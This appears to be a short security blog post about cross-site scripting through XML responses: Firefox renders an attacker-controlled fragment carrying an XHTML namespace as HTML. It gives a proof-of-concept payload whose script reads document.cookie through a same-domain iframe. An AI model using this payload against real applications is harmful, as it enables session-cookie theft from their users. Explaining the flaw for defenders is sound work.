Firefox renders xmlns xhtml in favor of XSS

My colleague John Hernandez showed me this trick the other day, which has proven useful as an exploit in many cases. If the site returns XML with a Content-Type: text/xml you'd normally think there's not much script injection potential. However there most certainly is if an attacker can control just one fragment of the XML.


<?xml version="1.0" encoding="UTF-8" ?>
<root>
<a>
(attacker controlled)
</a>
</root>


If the attacker can control the XML fragment in that part, they could insert something like:


<p xmlns='http://www.w3.org/1999/xhtml'>
<script>
function myfunction()
{
var doc = window.frames["myFrame"].document;
alert(doc.cookie);
}
</script>
<form>
<input type="button" onclick="myfunction()" value="Call function" />
</form>
<iframe src="site domain" id="myFrame" /> </p>


By specifying an xml namespace (xmlns) of xhtml, some browsers (Firefox only afaik), will treat the data as html and render it the domain hosting it. You use the iframe to point back to the domain and use its DOM to access the session information, which isn't available in the original XML DOM.

I believe this is desired functionality in Firefox, but we've found several exploitable issues in popular applications because of it.